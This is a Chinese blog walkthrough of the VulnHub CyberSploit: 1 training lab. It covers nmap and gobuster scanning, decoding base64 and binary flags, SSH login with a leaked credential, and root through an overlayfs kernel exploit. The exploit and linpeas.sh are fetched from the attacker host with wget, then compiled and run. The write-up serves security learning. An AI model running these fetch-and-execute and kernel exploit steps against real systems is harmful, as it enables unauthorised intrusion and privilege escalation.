vulnhub CyberSploit: 1

最新推荐文章于 2023-12-28 11:11:10 发布
最新推荐文章于 2023-12-28 11:11:10 发布
阅读量1.1k 收藏
点赞数 1
分类专栏: vulnhub 文章标签: base64 cyberchef 内核漏洞 overlayfs linpeas
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/125959752
版权

渗透思路:

nmap扫描 ---- 查看网页源代码 ---- gobuster扫描网站目录 ---- 命令行中base64解码 ---- ssh登录 ---- cyberchef解码二进制ascii码 ---- linpeas.sh检查提权可能性 ---- 内核漏洞提权

环境信息:

靶机:192.168.101.88

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.101.88

扫描到TCP 22(ssh)和80(http)端口

2、查看网页源代码发现用户名

浏览器访问80端口,发现一个网页

查看网页源代码,发现用户名itsskv

username:itsskv

3、gobuster扫描网站目录,得到密码(flag1)

gobuster dir -u http://192.168.101.88 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

扫描到/robots和/hacker(/hacker下没啥,就是主页的图片)

浏览器访问http://192.168.101.88/robots,发现base64编码的信息

R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9

命令行中输入如下命令进行base64解码

echo "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9" | base64 -d

得到flag1

Good Work !

Flag1: cybersploit{youtube.com/c/cybersploit}

4、ssh登录,二进制ascii码解码(flag2)

尝试以用户名itsskv,密码cybersploit{youtube.com/c/cybersploit}进行ssh登录

ssh itsskv@192.168.101.88

登录成功,在/home/itsskv下发现flag2.txt

flag2.txt中内容是二进制的ascii码

01100111 01101111 01101111 01100100 00100000 01110111 01101111 01110010 01101011 00100000 00100001 00001010 01100110 01101100 01100001 01100111 00110010 00111010 00100000 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 01111011 01101000 01110100 01110100 01110000 01110011 00111010 01110100 00101110 01101101 01100101 00101111 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 00110001 01111101

拿到cyberchef中解码,选From Binary,得到flag2的内容

good work !

flag2: cybersploit{https:t.me/cybersploit1}

5、内核漏洞提权(flag3)

攻击机上linpeas.sh所在文件夹起http服务

python2 -m SimpleHTTPServer 80

靶机上执行如下命令,从攻击机下载linpeas.sh,添加可执行权限,并执行

wget http://192.168.101.34/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

linpeas.sh发现了系统内核是有漏洞的3.13.0-32-generic

并且还给出了很可能提权成功的漏洞:overlayfs

exp的下载地址为:https://www.exploit-db.com/download/37292

先将exp下载到攻击机上,然后在靶机上执行如下命令,从攻击机上下载exp,编译,赋予编译后的文件可执行权限并执行

wget http://192.168.101.34/37292.c
gcc -o 37292 37292.c
chmod +x 37292
./37292

exp执行成功,得到root的shell,并在/root下找到finalflag.txt

仙女象
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶机-CyberSploit:1渗透笔记
liver100day的博客
07-30 617
文章目录1.环境搭建2.信息收集2.1 主机发现2.2 端口扫描2.3 访问80端口(http服务)2.4 爆破目录3.漏洞利用3.1 ssh登录4.提权1.在kali里面搜索有无该版本的漏洞利用文件2.将文件保存到本地(若不指定文件保存目录的话,文件保存的位置为你当前路径)3.使用python搭建一个简易的服务器4.控制ssh下载漏洞利用文件5.编译漏洞利用文件并执行提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机:CyberSploit:1
CyberSploit:1
小小猪的博客
10-28 1571
上传linpeas.sh进行漏洞发现,linpeas.sh自行在github上面下载。登录ssh,密码是flag1,查看到flag2。nmap扫描服务以及端口,发现80和22。扫描目录,发现robots.txt文件。进行解密,得到flag2。进行base64解密。得到第三个flag3。
vulnhub靶机-CyberSploit: 1
臭nana的博客
07-20 1373
这个系列的靶机解密部分有点像ctf的杂项,两个靶机都比较简单 1、找到靶机ip:192.168.0.130 nmap -sn 192.168.0.0/24 2、扫描靶机端口 3、访问80端口,动图还不错,F12查看源码发现一个用户名itsskv 4、手动尝试一下robots.txt文件,发现一串密文,base64解密得到flag1 root@kali:~# echo "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1..
Vulnhub-cybersploit1
dahege666的博客
06-06 605
靶场练习
misc2-数据编码
LXC_007的博客
10-28 1080
常见进制 进制转换 cyberchef(一个好的整合工具) 1.二进制转ASCII码 2->10->ASCII 2.二进制转morse码 2->10->ASCII 3.二进制转二维码(绘图) 1是一个黑点,0是一个白点,跑出来就是一个二维码的形状 4.二进制转16进制然后转成图片(hex) 可以用在线转换网站,如果觉得太卡了就可以用它转换网站下面给的脚本自己跑一下。 二进制转万物 …… 常见编码 (eg.ASCII码、base码、敲击码、二维码) 1.ASCII码 2.Bas
VulnHub靶场MONEYBOX:1
01-05
MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成各种挑战,提权、漏洞利用、代码审计等,最终获得root权限并发现flag。 在...
打靶练习vulnhub: stapler
最新发布
03-28
打靶练习vulnhub: stapler
打靶练习vulnhub: haclabs
03-20
打靶练习vulnhub: haclabs
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
VulnHub:VulnHub Box演练
03-16
VulnHub:VulnHub Box演练
计算文本中十六进制的校验和
10-19
计算文本中十六进制的校验和.在VC++60下测试通过.很好用的一个小工具.
CyberChef工具包
10-12
以网页的形式进行加密运算,操作简单,界面操作明确。
编码类型 ASCII URLcode编码 Unicode编码 utf编码理解
qq_61739597的博客
07-25 420
hello
【网络安全 | Misc】解码工具Koczkatamas及CyberChef安装及使用详析
等风来
12-28 4191
编码是网络安全的基础知识,有时我们需要对控制字符(不可打印字符)及可打印字符进行处理,将字符串的其他表示形式转为ASCII进而进行分析。本文介绍两个离线解码工具。
CTFmisc类密码题思路与多种做法(CyberChef、Ciphey)
Hardworking666的博客
01-02 6056
文章目录一、题目描述与分析二、在线网站做法三、CyberChef四、CipheyLaTeX 一、题目描述与分析 来源: BMZCTF第二届网络安全公开赛,主办单位:白帽子社区 · WHT战队,2022年1月1日 签到题 下载下来一段: 56465a7757464977546d464e656b354b5632786b5346457862336c4f4d4842485632785a4d6c5a47556c46554d557057556a464e656c5a46614646575644413555465177..
网络安全系列-三十八: 网络分析的瑞士军刀 CyberChef
penriver的博客
11-14 2166
CyberChef是英国情报机构政府通信总部(GCHQ)发布了一款新型的开源Web工具,为安全从业人员分析和解密数据提供了方便。 GCHQ一般指英国政府通讯总部。 英国政府通讯总部是英国秘密通讯电子监听中心,相当于美国国家安全局。缩写为GCHQ CyberChef是一款简单、直观的WEB应用程序,支持在浏览器中进行各种“网络”操作。 本文针对CyberChef进行介绍,使用docker进行部署,然后提供3个使用示例: 使用CyberChef分析powershell、char型恶意脚本、Webshell脚本
秒解混淆脚本!反混淆神器CyberChef使用指南
weixin_50464560的博客
08-19 1万+
CyberChef是一款强大的编码转换器,集成了多种编码转换的功能,能辅助大家方便快捷地解密出恶意脚本。 概述CyberChef是一款强大的编码转换器,地址在:https://gchq.github.io/CyberChef/它简单易懂易上手,集成了多种编码转换的功能,如:base64加解密、hex转换、char转换、正则表达式等,能辅助大家方便快捷地解密出恶意脚本。其界面如下图,最左边的Operations是转换工具集,把挑选好的工具经过DIY组合及排序拖拽到Recipe中,就可以对Input中的字符串
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值